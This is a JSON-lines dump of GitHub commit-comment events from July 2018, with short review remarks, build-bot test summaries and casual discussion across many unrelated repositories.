{"id":"7907921985","type":"CommitCommentEvent","actor":{"login":"kraileth"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29569647,"position":null,"line":null,"path":null,"commit_id":"280e1c5536b2dce33558cd019d32bc9cefca05a6","created_at":"2018-07-02T17:16:47Z","updated_at":"2018-07-02T17:16:47Z","author_association":"COLLABORATOR","body":"Hm... So you think it's worth a try to patch the configure script to accept the newer library and just see what happens? Don't know if it works or if I find it, but if it does that would certainly be a win."}},"created_at":"2018-07-02T17:16:47Z"}
{"id":"7907924368","type":"CommitCommentEvent","actor":{"login":"EmmaNguyen"},"repo":{"name":"EmmaNguyen/feature_adversarial_with_topology_signatures"},"payload":{"comment":{"id":29569653,"position":null,"line":null,"path":null,"commit_id":"e8ba481707c304e9bdac30b082c622447b37f349","created_at":"2018-07-02T17:17:19Z","updated_at":"2018-07-02T17:17:19Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Code: Implement topological signatures for Discriminator](https://trello.com/c/R59y4oHD/24-code-implement-topological-signatures-for-discriminator)"}},"created_at":"2018-07-02T17:17:19Z"}
{"id":"7907924513","type":"CommitCommentEvent","actor":{"login":"iwanttbepowerful"},"repo":{"name":"iwanttbepowerful/test"},"payload":{"comment":{"id":29569654,"position":null,"line":null,"path":null,"commit_id":"8fd6e361baf49b41bfcb62cc5e444dbca35fedae","created_at":"2018-07-02T17:17:21Z","updated_at":"2018-07-02T17:17:21Z","author_association":"OWNER","body":"之前改的太马虎了。。。。。"}},"created_at":"2018-07-02T17:17:21Z"}
{"id":"7907928229","type":"CommitCommentEvent","actor":{"login":"aead"},"repo":{"name":"minio/minio"},"payload":{"comment":{"id":29569665,"position":29,"line":295,"path":"cmd/encryption-v1.go","commit_id":"51b079a7b77ef1b3d94c954aebc0483f004ddcab","created_at":"2018-07-02T17:18:14Z","updated_at":"2018-07-02T17:18:14Z","author_association":"COLLABORATOR","body":"Actually I think you're right - makes the code more confusing... `CriticalIf` behavior should be enforced by tests instead of writing code that assumes it may not work... Will remove."}},"created_at":"2018-07-02T17:18:14Z"}
{"id":"7907931690","type":"CommitCommentEvent","actor":{"login":"luetge"},"repo":{"name":"luetge/ships"},"payload":{"comment":{"id":29569672,"position":null,"line":null,"path":null,"commit_id":"28345284eace3755c62c79cac353de9df3f015e8","created_at":"2018-07-02T17:18:58Z","updated_at":"2018-07-02T17:18:58Z","author_association":"OWNER","body":"Fun taxMan :D"}},"created_at":"2018-07-02T17:18:58Z"}
{"id":"7907932583","type":"CommitCommentEvent","actor":{"login":"Marco01809"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29569676,"position":null,"line":null,"path":null,"commit_id":"4415d1b6fc79420678ae6baed49840cc33c4ca60","created_at":"2018-07-02T17:19:11Z","updated_at":"2018-07-02T17:19:11Z","author_association":"NONE","body":"@Encamy Did you get less than 2500 XP per Tick?"}},"created_at":"2018-07-02T17:19:11Z"}
{"id":"7907934795","type":"CommitCommentEvent","actor":{"login":"grahamehorner"},"repo":{"name":"Azure/azure-webjobs-sdk"},"payload":{"comment":{"id":29569683,"position":20,"line":28,"path":"src/Microsoft.Azure.WebJobs.Host/Config/ExtensionConfigContext.cs","commit_id":"7f130355c4e6d2f67624d18c7cb695340eaa65e0","created_at":"2018-07-02T17:19:42Z","updated_at":"2018-07-02T17:19:42Z","author_association":"NONE","body":"please advise how/what method to use to gain access to the JobHostConfiguration; I was using this property inside a number of custom extensions from the public void Initialize(ExtensionConfigContext context) during callback? "}},"created_at":"2018-07-02T17:19:42Z"}
{"id":"7907935282","type":"CommitCommentEvent","actor":{"login":"mollala89"},"repo":{"name":"mollala89/My-Task"},"payload":{"comment":{"id":29569686,"position":1,"line":1,"path":"README.md","commit_id":"739194df3634fb7c516ccddc59ef9e0629ff2d77","created_at":"2018-07-02T17:19:48Z","updated_at":"2018-07-02T17:19:48Z","author_association":"OWNER","body":"#Hello World\r\nMy first task by my Manager"}},"created_at":"2018-07-02T17:19:48Z"}
{"id":"7907950318","type":"CommitCommentEvent","actor":{"login":"carlos74"},"repo":{"name":"carlos74/ProbandoGitHub"},"payload":{"comment":{"id":29569732,"position":null,"line":null,"path":null,"commit_id":"28ec9ab30c4c03c3e384c043afb6e68a29e26cc4","created_at":"2018-07-02T17:23:11Z","updated_at":"2018-07-02T17:23:11Z","author_association":"OWNER","body":"Te queda mejor así..."}},"created_at":"2018-07-02T17:23:11Z"}
{"id":"7907951879","type":"CommitCommentEvent","actor":{"login":"mora145"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29569736,"position":null,"line":null,"path":null,"commit_id":"5d6682c9ae228678b83a9f05f3af8c59ace13286","created_at":"2018-07-02T17:23:30Z","updated_at":"2018-07-02T17:23:30Z","author_association":"CONTRIBUTOR","body":"Yes. Thx @isonil Talking about it, can you tell me if you used a software to generate it?"}},"created_at":"2018-07-02T17:23:30Z"}
{"id":"7907952571","type":"CommitCommentEvent","actor":{"login":"carlos74"},"repo":{"name":"carlos74/ProbandoGitHub"},"payload":{"comment":{"id":29569737,"position":5,"line":9,"path":"index.html","commit_id":"28ec9ab30c4c03c3e384c043afb6e68a29e26cc4","created_at":"2018-07-02T17:23:40Z","updated_at":"2018-07-02T17:23:40Z","author_association":"OWNER","body":"Ojo con esta línea\r\n"}},"created_at":"2018-07-02T17:23:40Z"}
{"id":"7907954405","type":"CommitCommentEvent","actor":{"login":"mora145"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29569739,"position":null,"line":null,"path":null,"commit_id":"5d6682c9ae228678b83a9f05f3af8c59ace13286","created_at":"2018-07-02T17:24:04Z","updated_at":"2018-07-02T17:24:04Z","author_association":"CONTRIBUTOR","body":"it = The regular expression"}},"created_at":"2018-07-02T17:24:04Z"}
{"id":"7907956960","type":"CommitCommentEvent","actor":{"login":"Encamy"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29569744,"position":null,"line":null,"path":null,"commit_id":"4415d1b6fc79420678ae6baed49840cc33c4ca60","created_at":"2018-07-02T17:24:37Z","updated_at":"2018-07-02T17:24:37Z","author_association":"NONE","body":"@Marco01809 \r\n+2542 per tick, is it ok?"}},"created_at":"2018-07-02T17:24:37Z"}
{"id":"7907975134","type":"CommitCommentEvent","actor":{"login":"shawnmjones"},"repo":{"name":"oduwsdl/MementoEmbed"},"payload":{"comment":{"id":29569788,"position":6,"line":3,"path":"Dockerfile","commit_id":"abc07d1a2dd4ba012b8a1aa0a5e057be74ecb67e","created_at":"2018-07-02T17:28:44Z","updated_at":"2018-07-02T17:28:44Z","author_association":"COLLABORATOR","body":"Thanks. This will be fixed in a forthcoming commit."}},"created_at":"2018-07-02T17:28:44Z"}
{"id":"7907980176","type":"CommitCommentEvent","actor":{"login":"jendrikseipp"},"repo":{"name":"jendrikseipp/vulture"},"payload":{"comment":{"id":29569801,"position":14,"line":32,"path":"tests/test_report.py","commit_id":"6d18d81b92f627a97e77316f80c9b9eeaae6f3dd","created_at":"2018-07-02T17:29:46Z","updated_at":"2018-07-02T17:29:46Z","author_association":"OWNER","body":"Remove comment."}},"created_at":"2018-07-02T17:29:46Z"}
{"id":"7907985701","type":"CommitCommentEvent","actor":{"login":"jendrikseipp"},"repo":{"name":"jendrikseipp/vulture"},"payload":{"comment":{"id":29569817,"position":13,"line":31,"path":"tests/test_report.py","commit_id":"6d18d81b92f627a97e77316f80c9b9eeaae6f3dd","created_at":"2018-07-02T17:30:55Z","updated_at":"2018-07-02T17:30:55Z","author_association":"OWNER","body":"Let's pass `filename=foo.py`"}},"created_at":"2018-07-02T17:30:55Z"}
{"id":"7907988987","type":"CommitCommentEvent","actor":{"login":"L0FKA"},"repo":{"name":"rscustom/rocksmith-custom-song-toolkit"},"payload":{"comment":{"id":29569826,"position":null,"line":null,"path":null,"commit_id":"f393a62149a1431f82de173f456fb031a024dade","created_at":"2018-07-02T17:31:38Z","updated_at":"2018-07-02T17:31:38Z","author_association":"CONTRIBUTOR","body":"Thank you again :)"}},"created_at":"2018-07-02T17:31:38Z"}
{"id":"7907990031","type":"CommitCommentEvent","actor":{"login":"t0w5a"},"repo":{"name":"hiltonlv/Armeneasca13A_2_2"},"payload":{"comment":{"id":29569828,"position":8,"line":8,"path":"src/app/archive/archive.component.html","commit_id":"d0ea59d535c72edc6c9c4fc214e68b62b407b3bf","created_at":"2018-07-02T17:31:51Z","updated_at":"2018-07-02T17:31:51Z","author_association":"COLLABORATOR","body":"not sure, but I think the path should be `/assets/...` or `./assets/...` check it please"}},"created_at":"2018-07-02T17:31:51Z"}
{"id":"7907991887","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/crowdin-maven-plugin"},"payload":{"comment":{"id":29569830,"position":115,"line":152,"path":"pom.xml","commit_id":"7c6fea2fadabd115533bf7585cda6aacdf005206","created_at":"2018-07-02T17:32:16Z","updated_at":"2018-07-02T17:32:16Z","author_association":"NONE","body":"Or you could have used `lifecycleMappingMetadata` Maven configuration.\r\n\r\nAs a side not for the Eclipse users, it seem that this plugin should be a great enhancement when it will have a stable release:\r\nhttps://github.com/ifedorenko/com.ifedorenko.m2e.mavendev"}},"created_at":"2018-07-02T17:32:16Z"}
{"id":"7907993527","type":"CommitCommentEvent","actor":{"login":"RJ722"},"repo":{"name":"jendrikseipp/vulture"},"payload":{"comment":{"id":29569832,"position":13,"line":31,"path":"tests/test_report.py","commit_id":"6d18d81b92f627a97e77316f80c9b9eeaae6f3dd","created_at":"2018-07-02T17:32:38Z","updated_at":"2018-07-02T17:32:38Z","author_association":"CONTRIBUTOR","body":"We would then need to use `tmpdir`."}},"created_at":"2018-07-02T17:32:38Z"}
{"id":"7907997116","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29569841,"position":null,"line":null,"path":null,"commit_id":"8969ce6f966d2053e3baa65a20e4ee7090efe760","created_at":"2018-07-02T17:33:26Z","updated_at":"2018-07-02T17:33:26Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2928 of 2929 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 624\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8969ce6f966d2053e3baa65a20e4ee7090efe760-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8969ce6f966d2053e3baa65a20e4ee7090efe760-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-02T17:33:26Z"}
{"id":"7908001541","type":"CommitCommentEvent","actor":{"login":"iwolterstorff"},"repo":{"name":"iwolterstorff/dotfiles"},"payload":{"comment":{"id":29569851,"position":6,"line":6,"path":"fish/.config/fish/config.fish","commit_id":"1048bd6d8e4b0f2252bc839928d1e02059ec3217","created_at":"2018-07-02T17:34:26Z","updated_at":"2018-07-02T17:34:26Z","author_association":"OWNER","body":"I learned that from a very wise man..."}},"created_at":"2018-07-02T17:34:26Z"}
{"id":"7908002532","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29569857,"position":null,"line":null,"path":null,"commit_id":"280e1c5536b2dce33558cd019d32bc9cefca05a6","created_at":"2018-07-02T17:34:40Z","updated_at":"2018-07-02T17:34:40Z","author_association":"OWNER","body":"Can you paste the section of the configure script that tests the library?  You should be able to search in the configure script for it.  if it's clearly testing for the version then I'd guess it really needs the legacy library.  You might also do a quick google search and see if the question has already come up and been answered."}},"created_at":"2018-07-02T17:34:40Z"}
{"id":"7908004182","type":"CommitCommentEvent","actor":{"login":"BlackBeltPanda"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29569863,"position":null,"line":null,"path":null,"commit_id":"4415d1b6fc79420678ae6baed49840cc33c4ca60","created_at":"2018-07-02T17:35:03Z","updated_at":"2018-07-02T17:35:03Z","author_association":"NONE","body":"@Encamy Yeah, the problem is there's still a ton of people running the old code that does more damage, so the boss dies too fast. XP is based on the length of the battle; not how much damage you do. The more people that update to this version, the more XP everyone gets."}},"created_at":"2018-07-02T17:35:03Z"}
{"id":"7908004946","type":"CommitCommentEvent","actor":{"login":"t0w5a"},"repo":{"name":"hiltonlv/Armeneasca13A_2_2"},"payload":{"comment":{"id":29569865,"position":12,"line":12,"path":"src/app/archive/archive.component.ts","commit_id":"d0ea59d535c72edc6c9c4fc214e68b62b407b3bf","created_at":"2018-07-02T17:35:14Z","updated_at":"2018-07-02T17:35:14Z","author_association":"COLLABORATOR","body":"property name `temp` is not user friendly :)"}},"created_at":"2018-07-02T17:35:14Z"}
{"id":"7908009888","type":"CommitCommentEvent","actor":{"login":"Anomen77"},"repo":{"name":"Anomen77/proyecto-manhattan"},"payload":{"comment":{"id":29569873,"position":null,"line":null,"path":null,"commit_id":"d688e2902a50cb06180998e8561a4cebfe98f77d","created_at":"2018-07-02T17:36:20Z","updated_at":"2018-07-02T17:36:20Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [fdsfdfdsfd](https://trello.com/c/99xvA9gD/1-fdsfdfdsfd)"}},"created_at":"2018-07-02T17:36:20Z"}
{"id":"7908010361","type":"CommitCommentEvent","actor":{"login":"t0w5a"},"repo":{"name":"hiltonlv/Armeneasca13A_2_2"},"payload":{"comment":{"id":29569875,"position":29,"line":29,"path":"src/app/archive/archive.component.ts","commit_id":"d0ea59d535c72edc6c9c4fc214e68b62b407b3bf","created_at":"2018-07-02T17:36:26Z","updated_at":"2018-07-02T17:36:26Z","author_association":"COLLABORATOR","body":"function can be static"}},"created_at":"2018-07-02T17:36:26Z"}
{"id":"7908010949","type":"CommitCommentEvent","actor":{"login":"t0w5a"},"repo":{"name":"hiltonlv/Armeneasca13A_2_2"},"payload":{"comment":{"id":29569877,"position":34,"line":34,"path":"src/app/archive/archive.component.ts","commit_id":"d0ea59d535c72edc6c9c4fc214e68b62b407b3bf","created_at":"2018-07-02T17:36:34Z","updated_at":"2018-07-02T17:36:34Z","author_association":"COLLABORATOR","body":"function can be static"}},"created_at":"2018-07-02T17:36:34Z"}
{"id":"7908011523","type":"CommitCommentEvent","actor":{"login":"t0w5a"},"repo":{"name":"hiltonlv/Armeneasca13A_2_2"},"payload":{"comment":{"id":29569878,"position":39,"line":39,"path":"src/app/archive/archive.component.ts","commit_id":"d0ea59d535c72edc6c9c4fc214e68b62b407b3bf","created_at":"2018-07-02T17:36:42Z","updated_at":"2018-07-02T17:36:42Z","author_association":"COLLABORATOR","body":"function can be static"}},"created_at":"2018-07-02T17:36:42Z"}
{"id":"7908014718","type":"CommitCommentEvent","actor":{"login":"jendrikseipp"},"repo":{"name":"jendrikseipp/vulture"},"payload":{"comment":{"id":29569887,"position":13,"line":31,"path":"tests/test_report.py","commit_id":"6d18d81b92f627a97e77316f80c9b9eeaae6f3dd","created_at":"2018-07-02T17:37:19Z","updated_at":"2018-07-02T17:37:19Z","author_association":"OWNER","body":"Are you sure? We do so in test_scavenging.py."}},"created_at":"2018-07-02T17:37:19Z"}
{"id":"7908016842","type":"CommitCommentEvent","actor":{"login":"cwsmith"},"repo":{"name":"SCOREC/EnGPar"},"payload":{"comment":{"id":29569890,"position":17,"line":55,"path":"test/kokkosColoring.cpp","commit_id":"15983cc23f4a60fd3dff8bbc50e516d5c4868999","created_at":"2018-07-02T17:37:48Z","updated_at":"2018-07-02T17:37:48Z","author_association":"CONTRIBUTOR","body":"The degree and edge views are prefixed for the host, but for the vert_colors below the device view is prefixed.  It would be easier to read the code if the views were named consistently."}},"created_at":"2018-07-02T17:37:48Z"}
{"id":"7908018556","type":"CommitCommentEvent","actor":{"login":"ker1a"},"repo":{"name":"DarkestChrono/gbfraiders"},"payload":{"comment":{"id":29569892,"position":12,"line":1257,"path":"raids.json","commit_id":"de22fe1c5499a2b918b87728946c45bf9dc5901e","created_at":"2018-07-02T17:38:09Z","updated_at":"2018-07-02T17:38:09Z","author_association":"NONE","body":","}},"created_at":"2018-07-02T17:38:09Z"}
{"id":"7908027433","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/otrv4"},"payload":{"comment":{"id":29569912,"position":22,"line":1457,"path":"otrv4.md","commit_id":"8da4ee16b1db36ce97f3cfcc44191022f0fd5a38","created_at":"2018-07-02T17:40:06Z","updated_at":"2018-07-02T17:40:06Z","author_association":"MEMBER","body":"I said little? sorry, I meant big endian ;) is it ok?"}},"created_at":"2018-07-02T17:40:06Z"}
{"id":"7908029147","type":"CommitCommentEvent","actor":{"login":"Mark-Kerbin"},"repo":{"name":"Mark-Kerbin/Kerbal-Academy-Contract-Pack"},"payload":{"comment":{"id":29569918,"position":null,"line":null,"path":null,"commit_id":"7ba977249657edb4cd1b937ecabe68b9d608506e","created_at":"2018-07-02T17:40:28Z","updated_at":"2018-07-02T17:40:28Z","author_association":"OWNER","body":"-Thanks Gordon"}},"created_at":"2018-07-02T17:40:28Z"}
{"id":"7908029365","type":"CommitCommentEvent","actor":{"login":"t0w5a"},"repo":{"name":"hiltonlv/Armeneasca13A_2_2"},"payload":{"comment":{"id":29569920,"position":30,"line":30,"path":"src/app/article/article.component.html","commit_id":"d0ea59d535c72edc6c9c4fc214e68b62b407b3bf","created_at":"2018-07-02T17:40:31Z","updated_at":"2018-07-02T17:40:31Z","author_association":"COLLABORATOR","body":"I think here should be a ngIf=\"temp2\" otherwise you might have an error saying that you're trying to access element [0] of undefined, when `temp2` is not yet initialized"}},"created_at":"2018-07-02T17:40:31Z"}
{"id":"7908029460","type":"CommitCommentEvent","actor":{"login":"mohd-isa"},"repo":{"name":"riophae/vue-treeselect"},"payload":{"comment":{"id":29569921,"position":null,"line":null,"path":null,"commit_id":"a6fe555cbe85602b7dff863ace87a9a5263b9411","created_at":"2018-07-02T17:40:32Z","updated_at":"2018-07-02T17:40:32Z","author_association":"NONE","body":"great work!"}},"created_at":"2018-07-02T17:40:32Z"}
{"id":"7908029924","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29569922,"position":null,"line":null,"path":null,"commit_id":"eb68ccb2bfb3d01807412e33399299da8cdb4b11","created_at":"2018-07-02T17:40:38Z","updated_at":"2018-07-02T17:40:38Z","author_association":"NONE","body":"158538153-Maximum-Curve-Output-is-always-ignored-#6365 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2309 of 2309 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eb68ccb2bfb3d01807412e33399299da8cdb4b11-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eb68ccb2bfb3d01807412e33399299da8cdb4b11-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eb68ccb2bfb3d01807412e33399299da8cdb4b11-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-02T17:40:38Z"}
{"id":"7908030182","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/otrv4"},"payload":{"comment":{"id":29569923,"position":7,"line":1688,"path":"otrv4.md","commit_id":"05446358ff3a4fb9f9366df478d0d4c124d4b97a","created_at":"2018-07-02T17:40:42Z","updated_at":"2018-07-02T17:40:42Z","author_association":"MEMBER","body":"Ah.. yes. Well it can be both, as it should be the same instance tags in both profiles."}},"created_at":"2018-07-02T17:40:42Z"}
{"id":"7908031440","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"Staars/build"},"payload":{"comment":{"id":29569930,"position":null,"line":null,"path":null,"commit_id":"332ebdd67ee7cfd6264a3a52ba591e43fc1ed62d","created_at":"2018-07-02T17:40:59Z","updated_at":"2018-07-02T17:40:59Z","author_association":"NONE","body":"https://github.com/armbian/build/commit/c20367f02515971b2946f53f03ad176610149162"}},"created_at":"2018-07-02T17:40:59Z"}
{"id":"7908031605","type":"CommitCommentEvent","actor":{"login":"t0w5a"},"repo":{"name":"hiltonlv/Armeneasca13A_2_2"},"payload":{"comment":{"id":29569931,"position":13,"line":13,"path":"src/app/article/article.component.ts","commit_id":"d0ea59d535c72edc6c9c4fc214e68b62b407b3bf","created_at":"2018-07-02T17:41:01Z","updated_at":"2018-07-02T17:41:01Z","author_association":"COLLABORATOR","body":"bad names"}},"created_at":"2018-07-02T17:41:01Z"}
{"id":"7908031927","type":"CommitCommentEvent","actor":{"login":"sachinVachakal"},"repo":{"name":"sachinVachakal/ContactInformation"},"payload":{"comment":{"id":29569932,"position":null,"line":null,"path":null,"commit_id":"a78c13779e654b0437031eb78e6a2b268d8eb7fa","created_at":"2018-07-02T17:41:06Z","updated_at":"2018-07-02T17:41:06Z","author_association":"OWNER","body":"Repository Created"}},"created_at":"2018-07-02T17:41:06Z"}
{"id":"7908032902","type":"CommitCommentEvent","actor":{"login":"TeoTwawki"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":29569933,"position":null,"line":null,"path":null,"commit_id":"76aad6d23d05a966010df7f2b14ee788b254a861","created_at":"2018-07-02T17:41:18Z","updated_at":"2018-07-02T17:41:18Z","author_association":"MEMBER","body":"My near autistic level of hating redundancy/bloat/mislabeled things approves of this change"}},"created_at":"2018-07-02T17:41:18Z"}
{"id":"7908037540","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29569941,"position":null,"line":null,"path":null,"commit_id":"eb68ccb2bfb3d01807412e33399299da8cdb4b11","created_at":"2018-07-02T17:42:19Z","updated_at":"2018-07-02T17:42:19Z","author_association":"NONE","body":"158538153-Maximum-Curve-Output-is-always-ignored-#6365 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eb68ccb2bfb3d01807412e33399299da8cdb4b11-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-02T17:42:19Z"}
{"id":"7908037780","type":"CommitCommentEvent","actor":{"login":"t0w5a"},"repo":{"name":"hiltonlv/Armeneasca13A_2_2"},"payload":{"comment":{"id":29569943,"position":12,"line":12,"path":"src/app/blog/blog.component.ts","commit_id":"d0ea59d535c72edc6c9c4fc214e68b62b407b3bf","created_at":"2018-07-02T17:42:21Z","updated_at":"2018-07-02T17:42:21Z","author_association":"COLLABORATOR","body":"either `temp` should be initialized with an empty array, of in template use ngIf=\"temp\" before using it in the ngFor"}},"created_at":"2018-07-02T17:42:21Z"}
{"id":"7908039575","type":"CommitCommentEvent","actor":{"login":"JeanPaulLucien"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29569948,"position":null,"line":null,"path":null,"commit_id":"5f9592e4ff7e7c1eb01831b257c011c767f337c7","created_at":"2018-07-02T17:42:45Z","updated_at":"2018-07-02T17:42:45Z","author_association":"NONE","body":"So, will script get less xp?"}},"created_at":"2018-07-02T17:42:45Z"}
{"id":"7908041607","type":"CommitCommentEvent","actor":{"login":"mimugmail"},"repo":{"name":"opnsense/plugins"},"payload":{"comment":{"id":29569949,"position":null,"line":null,"path":null,"commit_id":"a8c65afca15a557bc7c3788ad3cacdfee2d18467","created_at":"2018-07-02T17:43:12Z","updated_at":"2018-07-02T17:43:12Z","author_association":"MEMBER","body":"If I remember correctly RootWyrm is still using it ... no Idea why."}},"created_at":"2018-07-02T17:43:12Z"}
{"id":"7908042607","type":"CommitCommentEvent","actor":{"login":"abramcumner"},"repo":{"name":"abramcumner/xray15"},"payload":{"comment":{"id":29569951,"position":null,"line":null,"path":null,"commit_id":"bfc77342e24e5ec658f35b74ccd3b746fd58d18b","created_at":"2018-07-02T17:43:25Z","updated_at":"2018-07-02T17:43:25Z","author_association":"OWNER","body":"Это \"HQ-Geometry fix от Shoker\"."}},"created_at":"2018-07-02T17:43:25Z"}
{"id":"7908042985","type":"CommitCommentEvent","actor":{"login":"Staars"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29569953,"position":null,"line":null,"path":null,"commit_id":"c20367f02515971b2946f53f03ad176610149162","created_at":"2018-07-02T17:43:30Z","updated_at":"2018-07-02T17:43:30Z","author_association":"CONTRIBUTOR","body":"Thank you!"}},"created_at":"2018-07-02T17:43:30Z"}
{"id":"7908044013","type":"CommitCommentEvent","actor":{"login":"t0w5a"},"repo":{"name":"hiltonlv/Armeneasca13A_2_2"},"payload":{"comment":{"id":29569958,"position":44,"line":44,"path":"src/app/blog/blog.component.ts","commit_id":"d0ea59d535c72edc6c9c4fc214e68b62b407b3bf","created_at":"2018-07-02T17:43:42Z","updated_at":"2018-07-02T17:43:42Z","author_association":"COLLABORATOR","body":"whole if can be written in one single line:\r\n`return current >= this.vector_size ? 0 : 1;`"}},"created_at":"2018-07-02T17:43:42Z"}
{"id":"7908044779","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"AllenChong/canoe-solidity"},"payload":{"comment":{"id":29569960,"position":null,"line":null,"path":null,"commit_id":"cd79b788f4337190fdbc091c375b0960372525c1","created_at":"2018-07-02T17:43:52Z","updated_at":"2018-07-02T17:43:52Z","author_association":"OWNER","body":"cd79b78"}},"created_at":"2018-07-02T17:43:52Z"}
{"id":"7908046477","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/plugins"},"payload":{"comment":{"id":29569963,"position":null,"line":null,"path":null,"commit_id":"a8c65afca15a557bc7c3788ad3cacdfee2d18467","created_at":"2018-07-02T17:44:14Z","updated_at":"2018-07-02T17:44:14Z","author_association":"MEMBER","body":"uh oh, let me talk to him one of these days about it..."}},"created_at":"2018-07-02T17:44:14Z"}
{"id":"7908047052","type":"CommitCommentEvent","actor":{"login":"aka-sektor"},"repo":{"name":"abramcumner/xray15"},"payload":{"comment":{"id":29569965,"position":null,"line":null,"path":null,"commit_id":"bfc77342e24e5ec658f35b74ccd3b746fd58d18b","created_at":"2018-07-02T17:44:21Z","updated_at":"2018-07-02T17:44:21Z","author_association":"NONE","body":"> HQ-Geometry fix\r\n\r\nЭт знаю.\r\n\r\nhttps://www.youtube.com/watch?v=p5X-nh8oTuM"}},"created_at":"2018-07-02T17:44:21Z"}
{"id":"7908047522","type":"CommitCommentEvent","actor":{"login":"buchgr"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29569966,"position":null,"line":null,"path":null,"commit_id":"4c9a0c82d308d5df5c524e2a26644022ff525f3e","created_at":"2018-07-02T17:44:27Z","updated_at":"2018-07-02T17:44:27Z","author_association":"CONTRIBUTOR","body":"That's only an initial step. We still want to ship a JDK that contains all APIs. If all things go well, we will switch to the minimal 19MiB JDK in 0.17.0"}},"created_at":"2018-07-02T17:44:27Z"}
{"id":"7908053436","type":"CommitCommentEvent","actor":{"login":"darxriggs"},"repo":{"name":"fujii/git-plugin"},"payload":{"comment":{"id":29569977,"position":29,"line":58,"path":"src/main/java/hudson/plugins/git/extensions/impl/SubmoduleOption.java","commit_id":"035090eaa6ddd2e7f9f7dc52052721e799ac9435","created_at":"2018-07-02T17:45:43Z","updated_at":"2018-07-02T17:45:43Z","author_association":"NONE","body":"Is this intended?\r\nNo new parameters have been added to the constructor.\r\nTherefore line 58 and 59 is just reassigning the same value."}},"created_at":"2018-07-02T17:45:43Z"}
{"id":"7908059367","type":"CommitCommentEvent","actor":{"login":"smed79"},"repo":{"name":"easylist/easylist"},"payload":{"comment":{"id":29569990,"position":null,"line":null,"path":null,"commit_id":"3314900b43adf6033b60a7c6bc20cec44086cb0b","created_at":"2018-07-02T17:47:01Z","updated_at":"2018-07-02T17:47:01Z","author_association":"CONTRIBUTOR","body":"@ryanbr \r\nhttps://forums.lanik.us/viewtopic.php?p=138401#p138401\r\nhttps://forums.lanik.us/viewtopic.php?p=124936#p124936"}},"created_at":"2018-07-02T17:47:01Z"}
{"id":"7908060580","type":"CommitCommentEvent","actor":{"login":"JeanPaulLucien"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29569993,"position":null,"line":null,"path":null,"commit_id":"4415d1b6fc79420678ae6baed49840cc33c4ca60","created_at":"2018-07-02T17:47:18Z","updated_at":"2018-07-02T17:47:18Z","author_association":"NONE","body":"Is planet quanitity limited? If not, I think there is no usefull from minimal damage. Because, we could farm more planets."}},"created_at":"2018-07-02T17:47:18Z"}
